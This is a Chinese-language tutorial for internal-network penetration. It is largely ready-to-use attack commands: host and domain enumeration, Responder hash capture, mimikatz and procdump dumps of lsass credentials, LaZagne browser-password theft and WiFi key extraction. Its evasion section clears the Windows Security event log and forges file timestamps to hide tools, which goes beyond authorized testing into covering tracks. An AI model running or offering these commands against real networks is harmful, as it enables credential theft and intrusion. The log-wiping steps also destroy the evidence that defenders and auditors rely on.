1. 内网渗透信息收集的核心价值
内网渗透测试中,信息收集阶段往往决定了整个渗透过程的成败。就像外科医生做手术前的全面检查一样,充分的信息收集能让我们看清内网的"骨骼结构"和"血液循环"。我见过太多新手一上来就急着用工具狂扫,结果触发警报被踢出网络,这就是典型的本末倒置。
真正专业的内网渗透,80%的时间都应该花在信息收集上。当你掌握了足够多的网络拓扑、账户权限、服务版本等信息后,后期的横向移动和权限提升往往水到渠成。这30个技巧是我在金融、政务、企业等多个行业实战中总结的精华,涵盖了从基础到高阶的全套方法论。
2. 基础信息收集:绘制内网地图
2.1 主机发现技巧
ARP扫描是最基础也最有效的方式。在内网环境中,即使有防火墙限制,ARP请求通常也能畅通无阻。我习惯先用这个命令快速摸清网段:
bash复制arp-scan -l --interface=eth0
注意要指定正确的网卡接口,否则可能漏扫关键网段。对于大型网络,可以配合如下命令进行分段扫描:
bash复制for i in {1..254}; do arping -c 1 192.168.1.$i | grep "bytes from"; done
重要提示:避免使用ICMP扫描(ping扫),现代内网中很多设备默认禁ping,会漏掉大量主机。
2.2 端口服务识别
发现主机后,下一步是识别开放端口。传统做法是用nmap全端口扫描,但在内网中这太显眼。我的经验是:
- 先用快速扫描确认常见端口(-F参数)
- 对关键主机再进行深度扫描
- 使用--scan-delay参数降低扫描速度
实战案例:在某次渗透中,我发现一台服务器开放了5985端口(WinRM),通过这个入口最终拿下了整个域控。关键命令:
bash复制nmap -sV -p 5985 192.168.1.100
3. 高级信息收集:深挖内网金矿
3.1 域环境信息收集
在Windows域环境中,以下命令能获取宝贵信息:
powershell复制# 查询域控制器
nltest /dclist:域名
# 获取域用户列表
net user /domain
# 查询域信任关系
nltest /domain_trusts
特别要注意SPN(服务主体名称)收集,这是发现特权账户的捷径:
powershell复制setspn -T 域名 -Q */*
3.2 密码策略分析
了解域密码策略能大大提高爆破成功率:
powershell复制net accounts /domain
重点关注:
- 密码最短使用期限
- 锁定阈值
- 锁定持续时间
我曾利用"密码最短使用期限=0"的漏洞,在15分钟内破解了域管理员密码。
4. 隐蔽信息收集技巧
4.1 流量镜像抓取
在内网交换机上,可以通过端口镜像获取流量。如果无法物理接触设备,可以尝试LLMNR/NBT-NS投毒:
bash复制responder -I eth0 -wrf
这种方法能截获NTLMv2哈希,成功率惊人。
4.2 内存凭证提取
当获取到一台主机权限后,不要急着横向移动,先提取内存中的凭证:
bash复制mimikatz.exe "sekurlsa::logonpasswords" "exit"
或者使用更隐蔽的Procdump+本地分析:
bash复制procdump.exe -ma lsass.exe lsass.dmp
5. 自动化信息收集框架
5.1 PowerUp实战
PowerUp是内网渗透的神器,可以一键检测配置漏洞:
powershell复制Import-Module .\PowerUp.ps1
Invoke-AllChecks
重点关注:
- 可写服务路径
- 未引用的服务路径
- AlwaysInstallElevated注册表项
5.2 BloodHound可视化
BloodHound能自动分析域内关系,生成攻击路径图:
powershell复制Invoke-BloodHound -CollectionMethod All -Domain 域名 -ZipFileName result.zip
导入数据后,重点关注:
- 最短域管路径
- Kerberoastable用户
- 具有DCSync权限的账户
6. 防御规避技巧
6.1 日志清除
完成信息收集后,记得清理痕迹:
powershell复制Clear-EventLog -LogName Security
或者更彻底的方式:
powershell复制wevtutil cl Security
6.2 时间戳伪造
修改文件时间戳避免引起怀疑:
powershell复制(Get-Item "C:\tools\mimikatz.exe").LastWriteTime = "01/01/2020 12:00:00"
7. 内网信息收集检查清单
这是我整理的必查项目表格:
| 类别 | 检查项 | 工具/命令 |
|---|---|---|
| 网络拓扑 | 子网划分/VLAN | traceroute, nmap |
| 主机信息 | 操作系统/补丁 | systeminfo, wmic |
| 账户信息 | 特权用户/服务账户 | net user, PowerView |
| 服务信息 | 中间件/数据库 | nmap -sV, telnet |
| 共享资源 | SMB/NFS共享 | smbclient, showmount |
| 密码策略 | 复杂度/锁定策略 | net accounts /domain |
| 信任关系 | 域信任/林信任 | nltest, Get-ADTrust |
| 应用系统 | Web应用/API接口 | dirb, nikto |
8. 实战经验与避坑指南
- DNS记录挖掘:很多内网系统的访问方式都记录在DNS中,使用如下命令获取宝贵信息:
bash复制nslookup -query=AXFR 域名 DNS服务器
- 打印机漏洞利用:内网打印机往往被忽视,却常包含敏感信息。尝试访问:
code复制http://打印机IP/hp/device/InternalPages/Index?id=Configuration
- 备份文件搜索:用这个命令快速查找备份文件:
bash复制find / -name "*bak*" -o -name "*backup*" 2>/dev/null
- 浏览器凭证提取:使用LaZagne工具提取保存的浏览器密码:
bash复制python laZagne.py browsers
- WiFi配置文件:在Windows中提取已连接过的WiFi密码:
powershell复制netsh wlan show profile name="SSID" key=clear
最后提醒三点关键经验:
- 信息收集要循序渐进,先静默后深入
- 所有操作都要记录,建立完整信息图谱
- 重点收集能形成攻击链的信息,不要贪多求全
内网渗透就像下围棋,信息收集就是布局阶段。看似缓慢,实则决定了整盘棋的走势。把这些技巧吃透练熟,你会发现内网渗透的效率能提升数倍。记住:快就是慢,慢就是快。